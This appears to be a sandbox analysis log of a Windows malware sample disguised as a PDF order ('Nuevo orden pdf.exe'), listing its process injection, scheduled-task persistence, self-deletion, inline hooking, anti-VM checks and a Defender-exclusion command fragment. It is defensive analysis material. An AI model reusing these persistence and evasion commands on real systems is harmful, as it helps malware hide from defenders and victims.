            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
            Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\NkwKQPLeekw' /XML 'C:\Users\user\AppData\Local\Temp\tmpA401.tmp'
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Nuevo orden pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Nuevo orden pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Nuevo orden pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: cmmon32.pdb source: RegSvcs.exe, 00000006.00000002.271574504.0000000000AB0000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000002.498401305.0000000006560000.00000002.00000001.sdmp
            Source: Binary string: cmmon32.pdbGCTL source: RegSvcs.exe, 00000006.00000002.271574504.0000000000AB0000.00000040.00000001.sdmp
            Source: Binary string: RegSvcs.pdb, source: cmmon32.exe, 0000000B.00000002.487231083.000000000526F000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.271818263.000000000100F000.00000040.00000001.sdmp, cmmon32.exe, 0000000B.00000002.484481118.0000000004E5F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, cmmon32.exe
            Source: Binary string: RegSvcs.pdb source: cmmon32.exe, 0000000B.00000002.487231083.000000000526F000.00000004.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000002.498401305.0000000006560000.00000002.00000001.sdmp
            Source: Nuevo orden pdf.exeStatic PE information: 0xEAA2096F [Tue Sep 28 04:49:51 2094 UTC]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D0E2 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D0EB push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D095 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D14C push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00407924 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041EA86 push cs; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00416C31 push ebp; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00417D4A pushfd ; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041651B push ebp; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DBD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1D0E2 push eax; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1D0EB push eax; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1D095 push eax; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1D14C push eax; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E07924 push es; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1EA86 push cs; iretd
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E16C31 push ebp; iretd
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E17D4A pushfd ; ret
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_00E1651B push ebp; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.65919160699
            Source: initial sampleStatic PE information: section name: .text entropy: 7.65919160699
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeFile created: C:\Users\user\AppData\Roaming\NkwKQPLeekw.exeJump to dropped file

            Boot Survival:

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\NkwKQPLeekw' /XML 'C:\Users\user\AppData\Local\Temp\tmpA401.tmp'

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xEA
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Nuevo orden pdf.exe PID: 5520, type: MEMORY
            Source: Yara matchFile source: 0.2.Nuevo orden pdf.exe.2e5f580.1.raw.unpack, type: UNPACKEDPE
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000E098E4 second address: 0000000000E098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000E09B5E second address: 0000000000E09B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409A90 rdtsc
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe TID: 5524Thread sleep time: -101318s >= -30000s
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exe TID: 5440Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 5892Thread sleep count: 34 > 30
            Source: C:\Windows\explorer.exe TID: 5892Thread sleep time: -68000s >= -30000s
            Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6176Thread sleep time: -48000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeThread delayed: delay time: 101318
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeThread delayed: delay time: 922337203685477
            Source: explorer.exe, 00000007.00000000.254726078.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000007.00000000.251999662.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 00000007.00000000.255308646.00000000088F9000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_VirJ
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: VMWARE
            Source: explorer.exe, 00000007.00000000.254726078.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 00000007.00000002.496346189.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000007.00000000.251999662.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: explorer.exe, 00000007.00000000.255419618.00000000089C6000.00000004.00000001.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&s
            Source: explorer.exe, 00000007.00000000.255419618.00000000089C6000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}
            Source: explorer.exe, 00000007.00000000.254726078.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
            Source: explorer.exe, 00000007.00000000.254344674.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000007.00000000.257861112.000000000F584000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
            Source: Nuevo orden pdf.exe, 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000007.00000002.496302001.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
            Source: explorer.exe, 00000007.00000000.254726078.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
            Source: explorer.exe, 00000007.00000000.254884318.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
            Source: explorer.exe, 00000007.00000000.251999662.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000007.00000000.242798162.0000000004E61000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.251999662.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\Nuevo orden pdf.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409A90 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0040ACD0 LdrLoadDll,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F158EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F420A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F420A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F420A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F420A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F420A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F420A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F590AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F19080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F93884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F93884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FD2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F30050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F30050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F97016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F97016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F97016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F1B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F951BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F951BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F951BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F951BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F461A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F461A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F969A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F42990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3C182 mov eax, dword ptr fs:[00000030h]
